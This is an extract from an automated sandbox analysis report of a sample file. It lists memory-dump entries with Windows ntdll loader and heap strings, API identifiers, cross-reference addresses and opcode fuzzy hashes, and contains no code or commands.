                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • LdrpCheckRedirection, xrefs: 015F488F
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015F4899
                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015F4888
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2558761708
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • LdrpInitializationFailure, xrefs: 015F20FA
                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 015F20F3
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015F2104
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: #%u
                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • LdrResSearchResource Enter, xrefs: 0157AA13
                                                                                                                                                              • LdrResSearchResource Exit, xrefs: 0157AA25
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                              • API String ID: 0-4066393604
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: `$`
                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$MUI
                                                                                                                                                              • API String ID: 0-17815947
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • kLsE, xrefs: 01570540
                                                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0157063D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                              • API String ID: 0-2547482624
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0157A2FB
                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0157A309
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: MUI
                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: GlobalTags
                                                                                                                                                              • API String ID: 0-1106856819
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .mui
                                                                                                                                                              • API String ID: 0-1199573805
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: EXT-
                                                                                                                                                              • API String ID: 0-1948896318
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: BinaryHash
                                                                                                                                                              • API String ID: 0-2202222882
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: #
                                                                                                                                                              • API String ID: 0-1885708031
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
Similarity
• API ID:
• String ID: BinaryName
• API String ID: 0-215506332
Uniqueness

Uniqueness Score: -1.00%

Strings
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015F895E
Memory Dump Source
• Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
• API String ID: 0-702105204
Uniqueness

Uniqueness Score: -1.00%


                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                              • Instruction ID: 8e3df6599697a9d59582918a8b8adb4320d8d7a1a4ee98ea79320b91b4fe3a5d
                                                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                              • Instruction Fuzzy Hash: FAB1D731604646AFDB25EB6CC850BBEBBF6BF84204F140599E652EF391D730E945CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1786e11df357676dd17476db79c9749b0584af00547219044a3381bd33055a66
                                                                                                                                                              • Instruction ID: fd6dcde378c0b0d57d98b7ddb5c739be619b98a2b36c89a5be5b3e17b8284d7a
                                                                                                                                                              • Opcode Fuzzy Hash: 1786e11df357676dd17476db79c9749b0584af00547219044a3381bd33055a66
                                                                                                                                                              • Instruction Fuzzy Hash: E2C147746083419FE764CF19C485BAEBBE5FF88304F44496DE9898B291E774E908CB92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6e3120f01c6f9ea88967ec3c54c24642ac79e2ebb4546abfda54c9eac2330668
                                                                                                                                                              • Instruction ID: cd0a72eaf00692dc742b02b6a70cc5fce9f160815650481b714f939c2c77bb76
                                                                                                                                                              • Opcode Fuzzy Hash: 6e3120f01c6f9ea88967ec3c54c24642ac79e2ebb4546abfda54c9eac2330668
                                                                                                                                                              • Instruction Fuzzy Hash: 77B17170A0026A8BDB64DF68C890BADB7F5FF94700F0485E9D54AEB241EB70DD85CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a462ba043584b49136aa3b32c6e6915c40ab86f118ca017fa70def2837db1382
                                                                                                                                                              • Instruction ID: 0de7e0976263270a0490f2a2678393e2ab3f22ac504d3bc2f97c149047d54599
                                                                                                                                                              • Opcode Fuzzy Hash: a462ba043584b49136aa3b32c6e6915c40ab86f118ca017fa70def2837db1382
                                                                                                                                                              • Instruction Fuzzy Hash: C5A12431E00256AFEF31DB5CD845BAEBBA4FB40754F050126EA12AF291D774AD41CBD2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4f9b1a893513f3decea197bb54c217d2781b49ae8a0471c53d413c1ba7d33fac
                                                                                                                                                              • Instruction ID: b6c507cc148461aba2b5e8b9057a0c151cc4a3dc6490b8312656dc3c381fc230
                                                                                                                                                              • Opcode Fuzzy Hash: 4f9b1a893513f3decea197bb54c217d2781b49ae8a0471c53d413c1ba7d33fac
                                                                                                                                                              • Instruction Fuzzy Hash: D7A1AE70A016169BDB25CF69C9D4BAFB7F5FF44318F14442AEA059F281EB38E815CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bdb6dd692b14d2aaca737e218892d98b74e1d00372143a4455a15fd7f11f8568
                                                                                                                                                              • Instruction ID: afe33792df5f28be424672db8667e5c560bb59a1368358cba4d3706e71229930
                                                                                                                                                              • Opcode Fuzzy Hash: bdb6dd692b14d2aaca737e218892d98b74e1d00372143a4455a15fd7f11f8568
                                                                                                                                                              • Instruction Fuzzy Hash: 5DA1CD72A10212AFD711DF28CD81B6ABBE9FF88704F054528E585EB761DB74EC01CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d2c83607bc7049b96eb6f033bd0dca933d8339b5cfa4e8162c30711a4035c6e3
                                                                                                                                                              • Instruction ID: 94b88468bfc2a1988c8d1caf11214ece656648b9e58362ed3c9a8400d62978e1
                                                                                                                                                              • Opcode Fuzzy Hash: d2c83607bc7049b96eb6f033bd0dca933d8339b5cfa4e8162c30711a4035c6e3
                                                                                                                                                              • Instruction Fuzzy Hash: 35916075E00216AFDB15CF68D894BAEBBB6FB48710F15416DE710EF291D734E9009BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 56036ea7f3c02d2dabec0c12dbc62268c0c4ff4cc5e2f186dfb5755b6fa0f423
                                                                                                                                                              • Instruction ID: 6107a85110aeec4087bfd5d8b80f5304fd2de16c28bbd425f60f649beff9557e
                                                                                                                                                              • Opcode Fuzzy Hash: 56036ea7f3c02d2dabec0c12dbc62268c0c4ff4cc5e2f186dfb5755b6fa0f423
                                                                                                                                                              • Instruction Fuzzy Hash: 23911231A006168BEB24BB5DD882B7DBBF1FB94714F054469E905EF291E734DD01CBA2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 10898b3ea20421e2c10fb1146d79676023bba92f93f1435333f557cb5fa2ab89
                                                                                                                                                              • Instruction ID: d7a3168c13b4a8a8c1c696b961b958bab87a3c06b946e4487d6e7d8cb71bb009
                                                                                                                                                              • Opcode Fuzzy Hash: 10898b3ea20421e2c10fb1146d79676023bba92f93f1435333f557cb5fa2ab89
                                                                                                                                                              • Instruction Fuzzy Hash: 15819571A0061A9FDB24CFA9C940ABEBBF5FB48B04F04852EE455EB740E334DA41CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                              • Instruction ID: 7a57d114ff2cab3f761dbfe1577069cc24ecfae46030f674c565c2330df50c96
                                                                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                              • Instruction Fuzzy Hash: B9817D72A0020A9FDF19CF98C890AAEBBB6BFC4310F18856DD956DB345D734E902DB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                              • Instruction ID: a615b63a8874f386e19d15b6256ac0445aeb12637cd8412907d8828a8a7849f7
                                                                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                              • Instruction Fuzzy Hash: 5251A831D0020EEFDF119E94C886BAEBBB5FB40324F16466DD7126F1A0D7709D4587A0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 13309228a91d780548141ec9ba1aa86094c3e77cd615726f77186ee4c2e144e3
                                                                                                                                                              • Instruction ID: bb5a01dbfb1ac4347f6bc863ec8cf1b037ab506bcaa2c15d9fef167861a1a8fb
                                                                                                                                                              • Opcode Fuzzy Hash: 13309228a91d780548141ec9ba1aa86094c3e77cd615726f77186ee4c2e144e3
                                                                                                                                                              • Instruction Fuzzy Hash: 9F41C1717056129BEB299B2DCC94BBBBB9EEFD0220F188319F95687381DB34D901C691
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 268faf1efb72d7528ec69c1ac9b91644a4f609e8eecbf4ba1aa967e8b18062f3
                                                                                                                                                              • Instruction ID: 3251b91228981f0323d511107d9327583c8f7ee9af32d625eabf9e6eb8cd3184
                                                                                                                                                              • Opcode Fuzzy Hash: 268faf1efb72d7528ec69c1ac9b91644a4f609e8eecbf4ba1aa967e8b18062f3
                                                                                                                                                              • Instruction Fuzzy Hash: CD517B7190021ADFCB20DFA9D980E9EBBB9FF88254B51852DD616EB744D730AD01CBD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                              • Instruction ID: bf728f4bc85d023651a601579551eca0c70cd8cc512796c33cf6692f50b3cd11
                                                                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                              • Instruction Fuzzy Hash: D641E8326007169FD729DF98CD80A6AB7A9FFC0210B05462EED92DB741EB30ED06D790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 13133f2c2022cf83df0ff5e758482c7b990615bfd95149386dcd3002ad52796b
